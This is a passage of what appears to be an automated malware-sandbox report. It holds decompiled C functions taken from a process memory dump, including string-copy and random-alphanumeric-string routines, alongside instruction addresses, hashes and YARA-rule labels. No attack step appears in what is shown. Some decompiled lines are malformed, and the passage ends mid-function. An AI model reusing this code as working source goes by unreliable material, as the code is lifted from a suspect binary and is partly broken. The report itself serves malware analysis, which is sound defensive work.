									_v40 = _t127;
									_t128 =  *_t155 & 0x0000ffff;
									 *_t110 = _t128;
									_t127 = _v40;
									if(_t128 != 0) {
										_v48 = 0;
										_v52 = _t120;
										_v36 = _t177;
										_t124 = _v48;
										while(1) {
											_t124 = _t124 + 1;
											_t183 =  *(_t155 + _t124 * 4 - 2) & 0x0000ffff;
											 *(_t110 + _t124 * 4 - 2) = _t183;
											if(_t183 == 0) {
												break;
											}
											_t184 =  *(_t155 + _t124 * 4) & 0x0000ffff;
											_t110[_t124] = _t184;
											if(_t184 != 0) {
												continue;
											}
											break;
										}
										_t120 = _v52;
										_t177 = _v36;
									}
								}
								_push(2);
								_push(_t155);
								_v52 = _t110;
								_v40 = _t127;
								E003B10B0();
								_t127 = _v40;
								_t110 = _v52;
								_t189 = _t189 + 8;
							}
							_t127[1] = _v44;
							 *_t127 = _t110;
						} else {
							_t110 = 0;
						}
						if(_t110 != 0) {
							_v52 = _t173;
							_t158 = 0;
							_v36 = _t177;
							_t175 = _v32;
							while(1) {
								_t182 =  *_t120 & 0x0000ffff;
								_t158 = _t158 + 1;
								 *_t110 = _t182;
								if(_t175 != 0 && _t158 == _t175) {
									break;
								}
								if(_t182 == 0) {
									_t173 = _v52;
									_t177 = _v36;
								} else {
									_t110 =  &(_t110[0]);
									_t120 = _t120 + 2;
									continue;
								}
								goto L53;
							}
							_t173 = _v52;
							_t177 = _v36;
							_t110[0] = 0;
						}
					}
				}
				L53:
				 *( *((intOrPtr*)(_t177 + 4)) + _t173 * 4) = _t127;
				 *_t177 =  *_t177 + 1;
				return _t177;
			}

0x003be0a9
0x003be0ac
0x003be0b5
0x003be0b8
0x003be0bc
0x003be0bf
0x003be0c2
0x003be0c7
0x003be0cc
0x003be0d6
0x003be0dc
0x003be0ed
0x003be0f2
0x003be0f4
0x003be0f7
0x003be0fc
0x003be102
0x003be105
0x003be105
0x003be107
0x003be109
0x003be11a
0x003be11f
0x003be11f
0x003be122
0x003be129
0x003be12b
0x003be130
0x003be388
0x003be136
0x003be138
0x003be13a
0x003be13f
0x003be30d
0x003be312
0x003be316
0x003be31b
0x003be31f
0x003be322
0x003be326
0x003be37a
0x003be328
0x003be32a
0x003be32c
0x003be32f
0x003be334
0x003be336
0x003be33a
0x003be33c
0x003be33c
0x003be33d
0x003be342
0x003be349
0x00000000
0x00000000
0x003be34b
0x003be34f
0x003be355
0x00000000
0x00000000
0x00000000
0x003be355
0x003be357
0x003be357
0x003be334
0x003be35b
0x003be35d
0x003be35e
0x003be362
0x003be366
0x003be36b
0x003be36f
0x003be373
0x003be373
0x003be37d
0x003be37f
0x003be150
0x003be152
0x003be155
0x003be187
0x003be18b
0x003be197
0x003be19d
0x003be1a1
0x003be1a5
0x003be1a7
0x003be1a7
0x003be1ac
0x003be1b0
0x003be1b6
0x00000000
0x00000000
0x003be1bc
0x003be1c1
0x00000000
0x003be1c3
0x003be1c3
0x003be1c7
0x003be1d3
0x00000000
0x00000000
0x00000000
0x00000000
0x003be1d3
0x00000000
0x003be1c1
0x003be3ce
0x003be3d5
0x003be3d9
0x003be157
0x003be157
0x003be161
0x003be1d5
0x003be1d5
0x003be1d9
0x003be1e5
0x003be1eb
0x00000000
0x003be1ed
0x003be1ed
0x003be1ed
0x003be1ed
0x00000000
0x003be1eb
0x003be3c5
0x003be163
0x003be168
0x003be16c
0x003be16e
0x003be172
0x003be17e
0x003be181
0x00000000
0x003be183
0x003be183
0x00000000
0x003be183
0x00000000
0x003be181
0x003be3a0
0x003be3a4
0x003be3a4
0x003be161
0x003be1f5
0x003be204
0x003be209
0x003be21c
0x003be21f
0x003be225
0x003be22d
0x003be22d
0x003be238
0x003be242
0x003be246
0x003be247
0x003be24b
0x003be250
0x003be254
0x003be257
0x003be25b
0x003be2c7
0x003be25d
0x003be25f
0x003be261
0x003be265
0x003be268
0x003be26d
0x003be271
0x003be273
0x003be27b
0x003be27e
0x003be282
0x003be286
0x003be286
0x003be287
0x003be28c
0x003be293
0x00000000
0x00000000
0x003be295
0x003be299
0x003be29f
0x00000000
0x00000000
0x00000000
0x003be29f
0x003be2a1
0x003be2a4
0x003be2a4
0x003be271
0x003be2a8
0x003be2aa
0x003be2ab
0x003be2af
0x003be2b3
0x003be2b8
0x003be2bc
0x003be2c0
0x003be2c0
0x003be2ce
0x003be2d1
0x003be20b
0x003be20b
0x003be20b
0x003be2d5
0x003be2db
0x003be2de
0x003be2e0
0x003be2e4
0x003be2f0
0x003be2f0
0x003be2f3
0x003be2f4
0x003be2f9
0x00000000
0x00000000
0x003be305
0x003be3bc
0x003be3bf
0x003be30b
0x003be2ea
0x003be2ed
0x00000000
0x003be2ed
0x00000000
0x003be305
0x003be3af
0x003be3b2
0x003be3b6
0x003be3b6
0x003be2d5
0x003be13f
0x003be38a
0x003be38f
0x003be392
0x003be39d

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74a8e911a4f29a8feecf1261f1edd226c0157e3f3747d79cfe280e31a92c4aa2
Instruction ID: 4d5db00384158dfbe324916f22cf375d516165516f8422f45c5208dfb876227e
Opcode Fuzzy Hash: 74a8e911a4f29a8feecf1261f1edd226c0157e3f3747d79cfe280e31a92c4aa2
Instruction Fuzzy Hash: 07A1CFB59047128BC326CF2DC44069BB7E2BFC4708F19CA2DEA999B754E731DD018792

Uniqueness

Uniqueness Score: -1.00%

Function 003BFDD0, Relevance: .2, Instructions: 240
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E003BFDD0(unsigned int __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v40;
				signed int _v44;
				signed short* _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int* _v68;
				signed int* _t81;
				unsigned int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t96;
				signed int _t105;
				signed int _t108;
				signed int _t114;
				unsigned int _t116;
				signed short* _t118;
				signed int _t122;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed short* _t144;
				signed int _t148;
				signed int _t151;
				signed int _t152;
				unsigned int _t157;
				signed int _t159;
				signed int _t160;
				signed int _t162;
				signed int _t163;
				intOrPtr _t165;
				signed int* _t167;
				signed int _t168;
				signed int _t169;
				void* _t171;
				void* _t172;

				_t171 = (_t169 & 0xfffffff0) - 0x34;
				_t105 = __edx;
				_t165 = _a4;
				_t157 = __ecx;
				if(_t165 < _a8) {
					_t165 = _t165 + E003CE170(0, 0) % (_a8 - _t165);
				}
				_push(0x80);
				 *_t157 = 0;
				 *(_t157 + 4) = 0;
				_t81 = E003B1030();
				_t172 = _t171 + 4;
				_t118 =  *_t157;
				if(_t118 == 0) {
					 *_t81 = 0;
					goto L11;
				} else {
					if(_t81 == 0) {
						L9:
						_push(2);
						_push(_t118);
						_v68 = _t81;
						E003B10B0();
						_t81 = _v68;
						_t172 = _t172 + 8;
						L11:
						 *_t157 = _t81;
						 *(_t157 + 4) = 0x40;
						if(_t165 <= 0) {
							L51:
							return _t157;
						}
						_v32 = _t105 & 0x00000001;
						_v40 = _t105 & 0x00000002;
						asm("pxor xmm0, xmm0");
						_v44 = _t105 & 0x00000004;
						_v28 = _t165;
						_t167 = 0;
						do {
							_t122 = E003CE170(0, 0x7f) & 0x0000ffff;
							if(_t122 - 0x61 > 0x19 || _v32 == 0) {
								if(_t122 - 0x41 > 0x19 || _v40 == 0) {
									if(_t122 - 0x30 > 9 || _v44 == 0) {
										goto L50;
									} else {
										goto L17;
									}
								} else {
									goto L17;
								}
							} else {
								L17:
								if(_t122 == 0) {
									L47:
									_t167 =  &(_t167[0]);
									goto L50;
								}
								_t136 =  *_t157;
								if(_t136 == 0) {
									_t108 = 0;
									L32:
									_t138 =  <=  ? 0x40 : _t108 + 2;
									if(_t138 >  *(_t157 + 4)) {
										_t90 = (_t138 >> 5 >> 0x1a) + _t138 >> 6;
										_t139 = _t138 & 0x8000003f;
										if(_t139 < 0) {
											_t139 = (_t139 - 0x00000001 | 0xffffffc0) + 1;
										}
										_t91 = _t90 + (0 | _t139 > 0x00000000);
										_v56 = _t91 << 6;
										_push(_t91 << 7);
										_v52 = _t122;
										_t93 = E003B1030();
										_t122 = _v52;
										_t172 = _t172 + 4;
										_t144 =  *_t157;
										if(_t144 == 0) {
											 *_t93 = 0;
											goto L45;
										} else {
											if(_t93 == 0) {
												L43:
												_push(2);
												_push(_t144);
												_v60 = _t93;
												_v52 = _t122;
												E003B10B0();
												_t122 = _v52;
												_t93 = _v60;
												_t172 = _t172 + 8;
												L45:
												 *(_t157 + 4) = _v56;
												 *_t157 = _t93;
												L46:
												 *(_t93 + _t108 * 2) = _t122;
												 *((short*)( *_t157 + 2 + _t108 * 2)) = 0;
												goto L47;
											}
											_v48 = _t144;
											_t148 =  *_t144 & 0x0000ffff;
											 *_t93 = _t148;
											_t144 = _v48;
											if(_t148 == 0) {
												goto L43;
											}
											_v64 = 0;
											_v68 = _t167;
											_v36 = _t157;
											_t168 = _v64;
											while(1) {
												_t168 = _t168 + 1;
												_t159 =  *(_t144 + _t168 * 4 - 2) & 0x0000ffff;
												 *(_t93 + _t168 * 4 - 2) = _t159;
												if(_t159 == 0) {
													break;
												}
												_t160 =  *(_t144 + _t168 * 4) & 0x0000ffff;
												 *(_t93 + _t168 * 4) = _t160;
												if(_t160 != 0) {
													continue;
												}
												break;
											}
											_t167 = _v68;
											_t157 = _v36;
											goto L43;
										}
									}
									_t93 =  *_t157;
									goto L46;
								}
								_t96 = _t136 & 0x0000000f;
								if(_t96 == 0) {
									L25:
									asm("pxor xmm1, xmm1");
									_v36 = _t157;
									_t114 =  ~( ~_t96 + 0x00000007 & 0x00000007) + 0x7fffffff;
									while(1) {
										asm("movdqu xmm0, [edx+eax*2]");
										asm("pcmpeqw xmm0, xmm1");
										asm("pmovmskb edi, xmm0");
										if(_t157 != 0) {
											break;
										}
										_t96 = _t96 + 8;
										if(_t96 < _t114) {
											continue;
										}
										_t157 = _v36;
										if(_t114 >= 0x7fffffff) {
											L31:
											_t108 = 0x7fffffff;
											goto L32;
										}
										L29:
										while(( *(_t136 + _t114 * 2) & 0x0000ffff) != 0) {
											_t114 = _t114 + 1;
											if(_t114 < 0x7fffffff) {
												continue;
											}
											goto L31;
										}
										L53:
										if(_t108 == 0xfffffffe) {
											 *_t136 = 0;
										}
										goto L32;
									}
									asm("bsf ebx, ebx");
									_t116 = _t157 >> 1;
									_t157 = _v36;
									_t108 = _t116 + _t96;
									goto L53;
								}
								_t114 = 0;
								if((_t96 & 0x00000001) != 0) {
									goto L29;
								}
								_t96 =  ~_t96 + 0x10 >> 1;
								_v36 = _t157;
								while(( *(_t136 + _t114 * 2) & 0x0000ffff) != 0) {
									_t114 = _t114 + 1;
									if(_t114 < _t96) {
										continue;
									}
									_t157 = _v36;
									goto L25;
								}
								_t157 = _v36;
								goto L53;
							}
							L50:
						} while (_t167 < _v28);
						goto L51;
					}
					_t151 =  *_t118 & 0x0000ffff;
					 *_t81 = _t151;
					if(_t151 == 0) {
						goto L9;
					}
					_v36 = _t157;
					_t152 = 0;
					while(1) {
						_t152 = _t152 + 1;
						_t162 =  *(_t118 + _t152 * 4 - 2) & 0x0000ffff;
						 *(_t81 + _t152 * 4 - 2) = _t162;
						if(_t162 == 0) {
							break;
						}
						_t163 =  *(_t118 + _t152 * 4) & 0x0000ffff;
						_t81[_t152] = _t163;
						if(_t163 != 0) {
							continue;
						}
						break;
					}
					_t157 = _v36;
					goto L9;
				}
			}

0x003bfdd9
0x003bfddc
0x003bfdde
0x003bfde1
0x003bfde6
0x003bfdfa
0x003bfdfa
0x003bfdfc
0x003bfe03
0x003bfe05
0x003bfe08
0x003bfe0d
0x003bfe10
0x003bfe14
0x003bfe60
0x00000000
0x003bfe16
0x003bfe18
0x003bfe49
0x003bfe49
0x003bfe4b
0x003bfe4c
0x003bfe50
0x003bfe55
0x003bfe59
0x003bfe63
0x003bfe63
0x003bfe65
0x003bfe6e
0x003c0071
0x003c007c
0x003c007c
0x003bfe83
0x003bfe87
0x003bfe8b
0x003bfe8f
0x003bfe93
0x003bfe97
0x003bfe99
0x003bfea5
0x003bfeae
0x003bfebd
0x003c005a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003bfece
0x003bfece
0x003bfed0
0x003c0051
0x003c0051
0x00000000
0x003c0051
0x003bfed6
0x003bfeda
0x003c00a5
0x003bff69
0x003bff74
0x003bff7a
0x003bff8d
0x003bff90
0x003bff96
0x003bff9e
0x003bff9e
0x003bffa9
0x003bffb3
0x003bffb7
0x003bffb8
0x003bffbc
0x003bffc1
0x003bffc5
0x003bffc8
0x003bffcc
0x003c0038
0x00000000
0x003bffce
0x003bffd0
0x003c0019
0x003c0019
0x003c001b
0x003c001c
0x003c0020
0x003c0024
0x003c0029
0x003c002d
0x003c0031
0x003c003b
0x003c003f
0x003c0042
0x003c0044
0x003c0044
0x003c004c
0x00000000
0x003c004c
0x003bffd2
0x003bffd6
0x003bffd9
0x003bffde
0x003bffe2
0x00000000
0x00000000
0x003bffe4
0x003bffec
0x003bffef
0x003bfff3
0x003bfff7
0x003bfff7
0x003bfff8
0x003bfffd
0x003c0004
0x00000000
0x00000000
0x003c0006
0x003c000a
0x003c0010
0x00000000
0x00000000
0x00000000
0x003c0010
0x003c0012
0x003c0015
0x00000000
0x003c0015
0x003bffcc
0x003bff7c
0x00000000
0x003bff7c
0x003bfee2
0x003bfee5
0x003bff0d
0x003bff11
0x003bff1d
0x003bff21
0x003bff27
0x003bff27
0x003bff2c
0x003bff30
0x003bff36
0x00000000
0x00000000
0x003bff3c
0x003bff41
0x00000000
0x00000000
0x003bff43
0x003bff4d
0x003bff64
0x003bff64
0x00000000
0x003bff64
0x00000000
0x003bff4f
0x003bff5b
0x003bff62
0x00000000
0x00000000
0x00000000
0x003bff62
0x003c0083
0x003c0086
0x003c008e
0x003c008e
0x00000000
0x003c0086
0x003c0098
0x003c009b
0x003c009d
0x003c00a1
0x00000000
0x003c00a1
0x003bfee7
0x003bfeeb
0x00000000
0x00000000
0x003bfef2
0x003bfef4
0x003bfef8
0x003bff04
0x003bff07
0x00000000
0x00000000
0x003bff09
0x00000000
0x003bff09
0x003c007f
0x00000000
0x003c007f
0x003c0067
0x003c0067
0x00000000
0x003bfe99
0x003bfe1a
0x003bfe1d
0x003bfe22
0x00000000
0x00000000
0x003bfe24
0x003bfe28
0x003bfe2a
0x003bfe2a
0x003bfe2b
0x003bfe30
0x003bfe37
0x00000000
0x00000000
0x003bfe39
0x003bfe3d
0x003bfe43
0x00000000
0x00000000
0x00000000
0x003bfe43
0x003bfe45
0x00000000
0x003bfe45

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c31f9b7cdb9490313d3b63a32406192f5372d33359b2d824e6fbf98519c66a29
Instruction ID: 8cab2d60004455535ad304ab87647f0f8e295f760d1efb73f372ed7e03f113e8
Opcode Fuzzy Hash: c31f9b7cdb9490313d3b63a32406192f5372d33359b2d824e6fbf98519c66a29
Instruction Fuzzy Hash: 4581F0716047518FC715CF29C88076AB3E2BFD8318F2A862DE5949B7A1EB31DC41C781

Uniqueness

Uniqueness Score: -1.00%

Function 003C0220, Relevance: .2, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E003C0220(signed int* __ecx, signed int _a4, signed int _a8) {
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t49;
				void* _t51;
				signed int _t52;
				signed int _t53;
				signed short* _t54;
				signed int _t55;
				signed int _t60;
				signed int _t65;
				signed int _t74;
				unsigned int _t79;
				signed int _t80;
				signed short* _t82;
				signed short* _t83;
				unsigned int _t91;
				signed int _t93;
				signed int _t98;
				void* _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				unsigned int _t113;
				signed short* _t115;
				signed int _t116;
				signed int _t117;
				signed int _t120;
				signed int _t124;
				void* _t126;

				_t126 = (_t124 & 0xfffffff0) - 0x14;
				_t113 = __ecx;
				_t120 = _a4;
				_t65 = _a8;
				if(_t120 != 0 && ( *_t120 & 0x0000ffff) != 0) {
					_t98 =  *__ecx;
					if(_t120 != _t98) {
						if(_t65 == 0) {
							_t93 = _t120 & 0x0000000f;
							if(_t93 == 0) {
								L9:
								asm("pxor xmm0, xmm0");
								_t65 =  ~( ~_t93 + 0x00000007 & 0x00000007) + 0x7fffffff;
								while(1) {
									asm("movdqu xmm1, [esi+ecx*2]");
									asm("pcmpeqw xmm1, xmm0");
									asm("pmovmskb eax, xmm1");
									if(_t49 != 0) {
										break;
									}
									_t93 = _t93 + 8;
									if(_t93 < _t65) {
										continue;
									} else {
										if(_t65 >= 0x7fffffff) {
											goto L15;
										} else {
											goto L13;
										}
									}
									goto L16;
								}
								asm("bsf ebx, eax");
								_t65 = (_t65 >> 1) + _t93;
							} else {
								_t65 = 0;
								if((_t93 & 0x00000001) != 0) {
									L13:
									while(( *(_t120 + _t65 * 2) & 0x0000ffff) != 0) {
										_t65 = _t65 + 1;
										if(_t65 < 0x7fffffff) {
											continue;
										} else {
											L15:
											_t65 = 0x7fffffff;
										}
										goto L16;
									}
								} else {
									_t93 =  ~_t93 + 0x10 >> 1;
									while(1) {
										_t49 =  *(_t120 + _t65 * 2) & 0x0000ffff;
										if(_t49 == 0) {
											goto L16;
										}
										_t65 = _t65 + 1;
										if(_t65 < _t93) {
											continue;
										} else {
											goto L9;
										}
										goto L16;
									}
								}
							}
						}
						L16:
						if(_t98 == 0) {
							_t74 = 0;
						} else {
							_t60 = _t98 & 0x0000000f;
							if(_t60 == 0) {
								L23:
								asm("pxor xmm0, xmm0");
								_v28 = _t113;
								_t74 =  ~( ~_t60 + 0x00000007 & 0x00000007) + 0x7fffffff;
								while(1) {
									asm("movdqu xmm1, [edx+eax*2]");
									asm("pcmpeqw xmm1, xmm0");
									asm("pmovmskb edi, xmm1");
									if(_t113 != 0) {
										break;
									}
									_t60 = _t60 + 8;
									if(_t60 < _t74) {
										continue;
									} else {
										_t113 = _v28;
										if(_t74 >= 0x7fffffff) {
											goto L29;
										} else {
											goto L27;
										}
									}
									goto L30;
								}
								asm("bsf ecx, ecx");
								_t91 = _t113 >> 1;
								_t113 = _v28;
								_t74 = _t91 + _t60;
							} else {
								_t74 = 0;
								if((_t60 & 0x00000001) != 0) {
									L27:
									while(( *(_t98 + _t74 * 2) & 0x0000ffff) != 0) {
										_t74 = _t74 + 1;
										if(_t74 < 0x7fffffff) {
											continue;
										} else {
											L29:
											_t74 = 0x7fffffff;
										}
										goto L30;
									}
								} else {
									_t60 =  ~_t60 + 0x10 >> 1;
									_v28 = _t113;
									while(( *(_t98 + _t74 * 2) & 0x0000ffff) != 0) {
										_t74 = _t74 + 1;
										if(_t74 < _t60) {
											continue;
										} else {
											_t113 = _v28;
											goto L23;
										}
										goto L30;
									}
									_t113 = _v28;
								}
							}
						}
						L30:
						_t20 = _t74 + 1; // 0xf561ae8c
						_t51 = _t65 + _t20;
						if(_t51 == 0 && _t98 != 0) {
							 *_t98 = 0;
						}
						_t52 =  <=  ? 0x40 : _t51;
						if(_t52 >  *(_t113 + 4)) {
							_t79 = (_t52 >> 5 >> 0x1a) + _t52 >> 6;
							_t53 = _t52 & 0x8000003f;
							__eflags = _t53;
							if(_t53 < 0) {
								_t53 = (_t53 - 0x00000001 | 0xffffffc0) + 1;
								__eflags = _t53;
							}
							__eflags = _t53;
							_t80 = _t79 + (0 | _t53 > 0x00000000);
							_v32 = _t80 << 6;
							_push(_t80 << 7);
							_t54 = E003B1030();
							_t126 = _t126 + 4;
							_t82 =  *_t113;
							__eflags = _t82;
							if(_t82 == 0) {
								__eflags = 0;
								 *_t54 = 0;
							} else {
								__eflags = _t54;
								if(_t54 != 0) {
									_t110 =  *_t82 & 0x0000ffff;
									 *_t54 = _t110;
									__eflags = _t110;
									if(_t110 != 0) {
										_v28 = _t113;
										_t111 = 0;
										__eflags = 0;
										while(1) {
											_t111 = _t111 + 1;
											_t116 =  *(_t82 + _t111 * 4 - 2) & 0x0000ffff;
											 *(_t54 + _t111 * 4 - 2) = _t116;
											__eflags = _t116;
											if(_t116 == 0) {
												break;
											}
											_t117 =  *(_t82 + _t111 * 4) & 0x0000ffff;
											 *(_t54 + _t111 * 4) = _t117;
											__eflags = _t117;
											if(_t117 != 0) {
												continue;
											}
											break;
										}
										_t113 = _v28;
									}
								}
								_push(2);
								_push(_t82);
								_v36 = _t54;
								E003B10B0();
								_t54 = _v36;
								_t126 = _t126 + 8;
							}
							 *(_t113 + 4) = _v32;
							 *_t113 = _t54;
						} else {
							_t54 =  *_t113;
						}
						_t83 = _t54;
						if(_t54 != 0) {
							if(( *_t54 & 0x0000ffff) != 0) {
								_v36 = _t120;
								_t109 = 0;
								_v28 = _t113;
								while(1) {
									_t109 = _t109 + 1;
									_t115 = _t54 + _t109 * 4;
									_t83 = _t115 - 2;
									if(( *(_t115 - 2) & 0x0000ffff) == 0) {
										break;
									}
									_t83 = _t115;
									if(( *_t115 & 0x0000ffff) != 0) {
										continue;
									}
									break;
								}
								_t120 = _v36;
								_t113 = _v28;
							}
							if(_t65 != 0) {
								if(__eflags > 0) {
									goto L56;
								}
							} else {
								_t65 = 0x7fffffff;
								L56:
								_t108 = 0;
								while(1) {
									_t55 =  *_t120 & 0x0000ffff;
									if(_t55 == 0) {
										goto L59;
									}
									_t108 = _t108 + 1;
									_t120 = _t120 + 2;
									 *_t83 = _t55;
									_t83 =  &(_t83[1]);
									if(_t108 < _t65) {
										continue;
									}
									goto L59;
								}
							}
							L59:
							 *_t83 = 0;
						}
					}
				}
				return _t113;
			}

0x003c0229
0x003c022c
0x003c022e
0x003c0231
0x003c0236
0x003c0247
0x003c024b
0x003c0253
0x003c0257
0x003c025a
0x003c0277
0x003c027b
0x003c0287
0x003c028d
0x003c028d
0x003c0292
0x003c0296
0x003c029c
0x00000000
0x00000000
0x003c02a2
0x003c02a7
0x00000000
0x003c02a9
0x003c02af
0x00000000
0x00000000
0x00000000
0x00000000
0x003c02af
0x00000000
0x003c02a7
0x003c049f
0x003c04a4
0x003c025c
0x003c025c
0x003c0261
0x00000000
0x003c02b1
0x003c02b9
0x003c02c0
0x00000000
0x003c02c2
0x003c02c2
0x003c02c2
0x003c02c2
0x00000000
0x003c02c0
0x003c0263
0x003c0268
0x003c026a
0x003c026a
0x003c0270
0x00000000
0x00000000
0x003c0272
0x003c0275
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c0275
0x003c026a
0x003c0261
0x003c025a
0x003c02c7
0x003c02c9
0x003c0498
0x003c02cf
0x003c02d1
0x003c02d4
0x003c02fc
0x003c0300
0x003c030c
0x003c0310
0x003c0316
0x003c0316
0x003c031b
0x003c031f
0x003c0325
0x00000000
0x00000000
0x003c032b
0x003c0330
0x00000000
0x003c0332
0x003c0332
0x003c033c
0x00000000
0x00000000
0x00000000
0x00000000
0x003c033c
0x00000000
0x003c0330
0x003c0488
0x003c048b
0x003c048d
0x003c0491
0x003c02d6
0x003c02d6
0x003c02da
0x00000000
0x003c033e
0x003c0346
0x003c034d
0x00000000
0x003c034f
0x003c034f
0x003c034f
0x003c034f
0x00000000
0x003c034d
0x003c02dc
0x003c02e1
0x003c02e3
0x003c02e7
0x003c02f3
0x003c02f6
0x00000000
0x003c02f8
0x003c02f8
0x00000000
0x003c02f8
0x00000000
0x003c02f6
0x003c047d
0x003c047d
0x003c02da
0x003c02d4
0x003c0354
0x003c0354
0x003c0354
0x003c035a
0x003c0362
0x003c0362
0x003c036d
0x003c0373
0x003c0386
0x003c0389
0x003c0389
0x003c038e
0x003c0396
0x003c0396
0x003c0396
0x003c0399
0x003c039e
0x003c03a8
0x003c03ac
0x003c03ad
0x003c03b2
0x003c03b5
0x003c03b7
0x003c03b9
0x003c0403
0x003c0405
0x003c03bb
0x003c03bb
0x003c03bd
0x003c03bf
0x003c03c2
0x003c03c5
0x003c03c7
0x003c03c9
0x003c03cd
0x003c03cd
0x003c03cf
0x003c03cf
0x003c03d0
0x003c03d5
0x003c03da
0x003c03dc
0x00000000
0x00000000
0x003c03de
0x003c03e2
0x003c03e6
0x003c03e8
0x00000000
0x00000000
0x00000000
0x003c03e8
0x003c03ea
0x003c03ea
0x003c03c7
0x003c03ee
0x003c03f0
0x003c03f1
0x003c03f5
0x003c03fa
0x003c03fe
0x003c03fe
0x003c040c
0x003c040f
0x003c0375
0x003c0375
0x003c0375
0x003c0411
0x003c0415
0x003c041c
0x003c041e
0x003c0421
0x003c0423
0x003c0427
0x003c0427
0x003c0428
0x003c042f
0x003c0434
0x00000000
0x00000000
0x003c0439
0x003c043d
0x00000000
0x00000000
0x00000000
0x003c043d
0x003c043f
0x003c0442
0x003c0442
0x003c0448
0x003c0451
0x00000000
0x00000000
0x003c044a
0x003c044a
0x003c0453
0x003c0453
0x003c0455
0x003c0455
0x003c045a
0x00000000
0x00000000
0x003c045c
0x003c045d
0x003c0460
0x003c0463
0x003c0468
0x00000000
0x00000000
0x00000000
0x003c0468
0x003c0455
0x003c046a
0x003c046c
0x003c046c
0x003c0415
0x003c024b
0x003c047a

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2db77dfe83392df997fdca982a5963f1cf45e072480f6015c9e3b136aec9b8fb
Instruction ID: bd26eaa9f12a20d559a218fe33353d4e3942cf34c840af972d2b8b5911d43381
Opcode Fuzzy Hash: 2db77dfe83392df997fdca982a5963f1cf45e072480f6015c9e3b136aec9b8fb
Instruction Fuzzy Hash: 41711875614792C7C72E4E2AC451B3B7296AFD0750B2A872CEAA6C76E0FB30DC51C740

Uniqueness

Uniqueness Score: -1.00%

Function 003C5CB0, Relevance: .2, Instructions: 230
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E003C5CB0(signed int* __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				signed int _t74;
				unsigned int _t83;
				signed int _t85;
				signed int _t86;
				signed int _t89;
				signed int _t95;
				char _t98;
				signed int _t100;
				intOrPtr _t104;
				char _t105;
				char _t106;
				void* _t112;
				intOrPtr _t113;
				signed int _t125;
				signed int _t127;
				signed int _t128;
				signed int _t131;
				void* _t134;
				signed int _t135;
				void* _t138;
				char _t140;
				char _t141;
				intOrPtr _t146;
				signed int _t148;
				signed int* _t150;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				void* _t156;
				signed int** _t157;

				_t156 = (_t154 & 0xfffffff0) - 0x34;
				_t95 = __edx;
				_t146 = _a4;
				_t150 = __ecx;
				if(_t146 < _a8) {
					_t146 = _t146 + E003CE170(0, 0) % (_a8 - _t146);
				}
				_push(0x40);
				 *_t150 = 0;
				_t150[1] = 0;
				_t74 = E003B1030();
				_t157 = _t156 + 4;
				_t100 =  *_t150;
				if(_t100 == 0) {
					 *_t74 = 0;
					goto L11;
				} else {
					if(_t74 == 0) {
						L9:
						_push(1);
						_push(_t100);
						_v64 = _t74;
						E003B10B0();
						_t74 = _v64;
						_t157 =  &(_t157[2]);
						L11:
						 *_t150 = _t74;
						_t150[1] = 0x40;
						if(_t146 <= 0) {
							L49:
							return _t150;
						}
						_v32 = _t95 & 0x00000001;
						_v40 = _t95 & 0x00000002;
						asm("pxor xmm0, xmm0");
						_v44 = _t95 & 0x00000004;
						_v28 = _t146;
						_t148 = 0;
						do {
							_t98 = E003CE170(0, 0x7f);
							_t28 = _t98 - 0x61; // -93
							if(_t28 > 0x19 || _v32 == 0) {
								_t30 = _t98 - 0x41; // -61
								if(_t30 > 0x19 || _v40 == 0) {
									_t70 = _t98 - 0x30; // -44
									if(_t70 > 9 || _v44 == 0) {
										goto L48;
									} else {
										goto L17;
									}
								} else {
									goto L17;
								}
							} else {
								L17:
								if(_t98 == 0) {
									L45:
									_t148 = _t148 + 1;
									goto L48;
								}
								_t125 =  *_t150;
								if(_t125 == 0) {
									_t104 = 0;
									L30:
									_t36 = _t104 + 2; // 0x6
									_t127 =  <=  ? 0x40 : _t36;
									if(_t127 > _t150[1]) {
										_t83 = (_t127 >> 5 >> 0x1a) + _t127 >> 6;
										_v52 = _t83;
										_t128 = _t127 & 0x8000003f;
										if(_t128 < 0) {
											_t128 = (_t128 - 0x00000001 | 0xffffffc0) + 1;
										}
										_t85 = _t83 + (0 | _t128 > 0x00000000) << 6;
										_v52 = _t85;
										_push(_t85);
										_v56 = _t104;
										_t86 = E003B1030();
										_t104 = _v56;
										_t157 =  &(_t157[1]);
										_t131 =  *_t150;
										_v48 = _t131;
										if(_t131 == 0) {
											 *_t86 = 0;
											goto L43;
										} else {
											if(_t86 == 0) {
												L41:
												_push(1);
												_push(_v48);
												_v60 = _t86;
												_v56 = _t104;
												E003B10B0();
												_t104 = _v56;
												_t86 = _v60;
												_t157 =  &(_t157[2]);
												L43:
												_t150[1] = _v52;
												 *_t150 = _t86;
												L44:
												 *((char*)(_t86 + _t104)) = _t98;
												 *((char*)( *_t150 + _t104 + 1)) = 0;
												goto L45;
											}
											_t134 =  *_t131;
											 *_t86 = _t134;
											if(_t134 == 0) {
												goto L41;
											}
											 *_t157 = _t150;
											_t135 = 0;
											_v56 = _t104;
